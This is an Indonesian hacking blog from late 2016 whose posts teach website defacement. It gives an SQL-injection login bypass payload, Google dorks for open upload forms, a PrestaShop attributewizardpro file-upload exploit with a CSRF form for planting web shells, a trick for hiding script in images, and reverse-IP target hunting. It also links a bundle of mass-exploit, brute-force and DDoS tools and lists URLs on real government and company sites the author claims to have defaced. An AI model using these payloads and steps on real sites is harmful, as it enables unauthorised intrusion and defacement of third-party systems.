Friday, December 16, 2016

Admin Dasboard Url Trik

     Selamat siang,malem,pagi sore semua kalian tentu sangat senang atau bahaga ketika menumukan user dan password di suatu website, tapi bagaimana ketika kaliann sudah berada di dashboard admin website tersebut ketika pencet menu-menunya tidak bisa ? pasti perasaan bercampur aduk udah kaya koko crunch jangan khwatir coba trik ini cuman buat namba wawasan aja.

Caranya sangatlah simple kita hanya butuh pisang, eh maksut gua otak pertama lu bisa scan webnya dengan acuantix untuk mengetahui Url dashboard tersebut Atau dengan cara CTRL + U Nah ini jurus pamungkas gua, dari situ lu bisa pencet pencet urlnya, Contoh lu mau klik Edit berita lewat dashboard admin ehh ketika di klik malah www.site/homeadmin.php# malah dibelakang ada tanda (#) alias tidak Work :D
nahh maka lu bisa lakuin itu lewat view-sourcenya dan hal selanjutnya lu tinggal gunain  pisang otak lu.
Sekian Trik Dan Tips dari gua
                              

                                  Ingat Tidak Semua Website Bisa Diginiin
                                     Never  Stop Your Art, Thanks You :D

Thursday, December 15, 2016

Bypass Admin With Email

Sebelumnya terimakasih ke pada bang evelyn :D (GSH)

Hallow Gans :*
Oke saya akan posting lagi.

Pertama nya saya coba coba , Lalu saya ketagihan .

Imajinasi Bokep mu gak akan menghentikan Imajinasimu 


Bypass admin email , gimana sih cara nya ? cuman nambahin @gmail.com / @yahoo.com dll

contoh seperti web berikut :




Nah di situ saya menggunakan user : '=''or' password : '=''or'
tapi di situ harus ada tanda @
kita cuman nambahin @gmail.com / @yahoo.com / terserah
user : '=''or'@gmail.com
pw : '=''or'


nah liat ss berikut :


Dooorrrr :*


NOTE : Tidak Semua Web Bisa diginiin .

Friday, December 9, 2016

Tools Deface Script

Kali ini gua akan share Tools Deface gua masukin dalam satu script, untuk fiture lumayan banyak Kalo kurang atau ada yang error perbaiki aja sendiri,
Kalo ada kesalah dalam penulisan mohon di perbaiki, maklum orang baru belajar hehe
Cara pemakainan cukup tanam aja di hostingan atau localhost mu
List Fiture:
Admin Finder
Bing Graber
CSRF Online
DefacerID
Kcfinder Auto Exploit
WP Brute Force
Dorker
Encode Decode
jquery File Uploade
Popoji Auto Register
Magento Add Admin
Elfiender Mass Exploit
Lokmedia Auto Deface
Pretashop Auto Exploit
Webdav Auto Exploit
DDOS Tools
Brute Force Twitter
SQLI Scanner
Port Scanner
Drupal Mass Exploit
Magento Admin Brute Force
Pretashop Auto Exploit
Hash ID
Tevolution Auto Exploit
Whois
Data Base Dump
WP U-Desaign Auto Exploit
Base 64 Encode/ Decode
Drupal Auto Exploit
Untuk SC tinggal comod nih http://pastebin.com/Fm1vtiPZ

Tuesday, November 29, 2016

Registration Upload

             Rasanya udah seminggu gua belum buka blog, untung ada waktu gua sempatin buat buka dan sesambil mau posting yang udah gak asing lagi tentang upload, mayan buat yang suka nyari mirror/rangking.
Pertama dorking:
inurl:/user/register intitle:user account intext:upload
inurl:/user/register intitle:user account intext:allowed txt
inurl:/user/register intitle:user account intext:upload site:com
kemudian cari web yang ada tempat uploadnya seperti ini


nahh kemudian upload file 
dengan ekstensi txt/php ingat kata katanya harus ada (hacked) di sclu biar bisa ke mirror di zone-h/defacer.id dll
Nihh hasil gua :
http://www.dopelibrary.gov.mm/sites/default/files/public/fuck.txt
http://labourportal.gov.mm/sites/default/files/public/fuck.txt
https://eurodesk.eu/sites/default/files/profile_image/fuck.php.txt
http://jobbank.emilyslist.org/sites/jobbank/files/resumes/th3331480408098482/fuck.txt http://www.meyervandenberg.com.au/sites/default/files/profiles/0/cvupload/fuck.txt
http://staffmobility.eu/sites/default/files/fuck.php.txt
http://www.byrnesandrupkey.com/system/files/resumes/fuck.txt
http://bimba.co.za/sites/default/files/fuck.php.txt
sekian dari gua Xai Syndicate Ty kalo udah mampir di blog gua, kalo ada kelasahan cuekin aja, namanya juga hanya sharing. byee~~~

Thursday, November 17, 2016

Hidden Script in Image

    Kali ini gua mau sharing tentang bagaimana cara deface dengan ngumpetin script di gambar, mungkin udah banyak yang tau, tapi mungking pemain baru kaya gua gini .mungkin juga baru tau atau mau tau. nahh langsung aja nihh ke TKP
pertama buka gambar apa aja bebas, bokep juga bisa wkwk. kemudian Open with notepad
dan kemudian masukan script  ini
Nahh kalo udah selesai terserah dah mau lu upload di mana, di mirror juga bisa ke Zone-h.org
Demo hasil:mirror di leetszone


sekian trick dari gua kalo ada yang salah atau kurang mohon dibenarkan atau di perbaiki,

Wednesday, November 16, 2016

Dorking Nazuka Dengan Neighbors

             Kali ini gua akan share bagaimana cara dorking website yang hosting di nazuka.net, sebenarnya sangat simple kita hanya butuh satu  ip dari web tersebut, bagaimana caranya ?  kita reverse dulu webnya untuk mengetahui ip dari web tersebut di http://www.yougetsignal.com/tools/web-sites-on-web-server/ contoh gua check phongit.net


       kemudian lihat ip nya di sebelah kanan tuh 31.170.166.13


nah kemudian lu scan di  http://www.tcpiputils.com/
Nih hasilnya yang gua scan dari 31.170.166.13

     

tuh muncul 10 web yang hosting di nazuka.net dan ada domains around masih 1 ip sama nazuka.net tinggal lu buka buka aja terus copy di notepad atau apalah buat di kumpulin :D
kemudian tinggal masukin 1-1 exploitnya.
Sekian tutorial dari gua.

Thursday, November 3, 2016

AttributeWiazardPro fileupload


Udah lama belum posting, kali ini gua akan memberikan tutorial dengan attribute wizardpro, apa sih wizard pro itu ? udh gak usah di pikirin, langsung aja nih step by step.
dork inurl:/modules/attributewizardpro/
exploitnya:/modules/attributewizardpro/image_upload.php
                //modules/attributewizardpro/file_upload.php
ada 2 tempat upload
ciri ciri target yang vuln ada  bacaan gitu di exploitnya
Error: Could not copy file, please check there is writing permissions to /home/heartarrow/domains/heart-arrow.nl/public_html/webshop/modules/attributewizardpro/file_uploads/
untuk upload shell bisa menggunakan csrf online dengan type (userfile) atau bisa juga gunakan

copy csrf ini  dengan ekstensi csrf.html
<form method="POST" action="http://target.co.li" enctype="multipart/form-data"> <input type="file" name="userfile" /><button>Upload</button> </form>
cara manggil shell kalo menggunakan exploit image_upload.php bisa di /img/id_group_.php tergantung ekstensi
kalo lewat file_upload.php bisa di /modules/attributewizardpro/file_uploads/ nama shell angka random
sekian tutorial dari gua.


Labels